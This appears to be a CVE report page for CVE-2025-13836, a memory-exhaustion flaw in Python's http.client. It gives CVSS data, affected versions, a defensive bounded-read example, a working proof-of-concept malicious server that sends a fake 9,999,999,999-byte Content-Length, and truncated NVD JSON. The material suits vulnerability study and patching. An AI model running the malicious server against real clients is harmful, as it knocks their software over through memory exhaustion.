Security Vulnerability Report
CVE-2025-13836 CVSS 7.5 HIGH

CVE-2025-13836

Published: 2025-12-01 18:16:04
Last Modified: 2026-05-18 16:58:52

Description

When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This allows a malicious server to cause the client to read large amounts of data into memory, potentially causing OOM or other DoS.
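A defensive counterpart to the behaviour described above, added here and not part of the NVD record or of CPython: a bounded reader that rejects an oversized declared Content-Length before reading anything and then reads in fixed-size chunks with a hard cap, so neither a huge header value nor a length-less body that streams until close can exhaust client memory. The `_FakeSock` helper, the three canned responses and the byte caps are constructed for this example.

```python
import http.client
import io


class ResponseTooLarge(Exception):
    """Raised when a response body would exceed the caller's byte cap."""


class _FakeSock:
    """Constructed stand-in for a socket so HTTPResponse can parse canned bytes offline."""
    def __init__(self, data):
        self._data = data

    def makefile(self, mode, *args, **kwargs):
        return io.BytesIO(self._data)


def read_bounded(response, max_bytes, chunk_size=64 * 1024):
    """Read an http.client.HTTPResponse body without sizing anything from Content-Length.

    Check one: refuse a declared length above the cap before reading a byte.
    Check two: read(amt) in fixed chunks, so the header never picks the buffer size,
    and stop as soon as the accumulated body passes the cap (covers length-less bodies)."""
    declared = response.getheader("Content-Length")
    if declared is not None and declared.strip().isdigit() and int(declared) > max_bytes:
        raise ResponseTooLarge(f"declared Content-Length {declared} exceeds cap {max_bytes}")
    body = bytearray()
    while True:
        # Ask for at most one byte past the cap so an overrun is detected, not buffered.
        chunk = response.read(min(chunk_size, max_bytes - len(body) + 1))
        if not chunk:
            break
        body += chunk
        if len(body) > max_bytes:
            raise ResponseTooLarge(f"body exceeded cap of {max_bytes} bytes")
    return bytes(body)


def safe_body(raw_response, max_bytes):
    """Parse canned response bytes and return the body, or None if it was rejected."""
    resp = http.client.HTTPResponse(_FakeSock(raw_response), method="GET")
    resp.begin()
    try:
        return read_bounded(resp, max_bytes)
    except ResponseTooLarge:
        return None


# Constructed sample responses (not captured traffic).
MALICIOUS = b"HTTP/1.1 200 OK\r\nContent-Length: 9999999999\r\n\r\nSmall payload - rest is never sent\n"
HONEST = b"HTTP/1.1 200 OK\r\nContent-Length: 6\r\n\r\nhello\n"
LENGTHLESS = b"HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n" + b"x" * 64
```

`safe_body(MALICIOUS, 1024)` is refused on the header alone, `safe_body(LENGTHLESS, 16)` is refused after 17 bytes arrive, and an honest response passes through unchanged.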

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (versions before 3.10.20) - VULNERABLE
cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (3.11.0 up to, excluding, 3.11.15) - VULNERABLE
cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (3.12.0 up to, excluding, 3.12.13) - VULNERABLE
cpe:2.3:a:python:python:*:*:*:*:*:*:*:* (3.13.0 up to, excluding, 3.13.11) - VULNERABLE
cpe:2.3:a:python:python:3.14.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:* - VULNERABLE
Version ranges are taken from the cpeMatch entries in the raw JSON record below; all of them ship the vulnerable urllib/http.client read path.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""
CVE-2025-13836 PoC - Malicious HTTP Server

This script simulates a malicious server that exploits the Content-Length
vulnerability in Python's HTTP client to cause memory exhaustion on the
client side.
"""
import socket
import threading
import time


def handle_client(client_socket):
    """Handle incoming client connection with malicious Content-Length"""
    try:
        # Read HTTP request (we don't really need to process it)
        request = client_socket.recv(4096)

        # Send malicious HTTP response with huge Content-Length
        # The actual body is minimal, but Content-Length claims huge size
        malicious_response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Type: text/plain\r\n"
            "Content-Length: 9999999999\r\n"  # Huge fake size
            "\r\n"
            "Small payload - rest is never sent\n"
        )
        client_socket.send(malicious_response.encode())
        time.sleep(30)  # Keep connection alive
    except Exception as e:
        print(f"Error: {e}")
    finally:
        client_socket.close()


def start_malicious_server(port=8888):
    """Start the malicious HTTP server"""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', port))
    server.listen(5)
    print(f"Malicious server listening on port {port}")

    while True:
        client, addr = server.accept()
        print(f"Connection from: {addr}")
        client_handler = threading.Thread(target=handle_client, args=(client,))
        client_handler.start()


# Client-side exploit demonstration
def exploit_client(target_host, target_port=8888):
    """
    Vulnerable client code - DO NOT USE IN PRODUCTION
    This demonstrates how Python HTTP client can be exploited
    """
    import http.client

    connection = http.client.HTTPConnection(target_host, target_port)
    connection.request("GET", "/")
    response = connection.getresponse()

    # This is the vulnerable part - read() without size limit
    # Will attempt to allocate massive buffer based on Content-Length
    try:
        data = response.read()  # Vulnerable: no size limit
        print(f"Read {len(data)} bytes")
    except MemoryError:
        print("Memory exhaustion triggered!")


if __name__ == "__main__":
    print("=== CVE-2025-13836 PoC ===")
    print("Start server: python cve-2025-13836_poc.py")
    start_malicious_server()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13836", "sourceIdentifier": "[email protected]", "published": "2025-12-01T18:16:04.200", "lastModified": "2026-05-18T16:58:51.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This allows a malicious server to cause the client to read large amounts of data into memory, potentially causing OOM or other DoS."}, {"lang": "es", "value": "Al leer una respuesta HTTP de un servidor, si no se especifica una cantidad de lectura, el comportamiento predeterminado será usar Content-Length. Esto permite a un servidor malicioso hacer que el cliente lea grandes cantidades de datos en la memoria, lo que podría causar OOM u otro DoS."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.10.20", "matchCriteriaId": "1F853468-5391-4279-B369-E480A2B91D6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.11.0", "versionEndExcluding": "3.11.15", "matchCriteriaId": "7B38F8DA-DD8F-4887-AC85-CE843E21AD74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.12.0", "versionEndExcluding": "3.12.13", "matchCriteriaId": "963DB620-5766-4093-A80B-03F7975F712B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.13.0", "versionEndExcluding": "3.13.11", "matchCriteriaId": "7FE4D2F0-2F91-4444-87E4-F9231694D429"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.14.0:-:*:*:*:*:*:*", "matchCriteriaId": 
"D9A884CF-F98D-490D-A3B6-74F0DBFC3BD3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "A3327507-0B1D-4F28-A983-D07A2C8A7696"}, {"vulnerable": true, "criteria": "cpe:2.3:a:python:python:3.15.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "C8AF17F1-A27F-4C98-BA5A-B4319710E8D1"}]}]}], "references": [{"url": "https://github.com/python/cpython/commit/14b1fdb0a94b96f86fc7b86671ea9582b8676628", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/289f29b0fe38baf2d7cb5854f4bb573cc34a6a15", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/4ce27904b597c77d74dd93f2c912676021a99155", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/5a4c4a033a4a54481be6870aa1896fad732555b5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/python/cpython/commit/5dc101675fd22918facbbe0fecdc821502beaaf0", "source": "[email protected]", "tags": ... (truncated)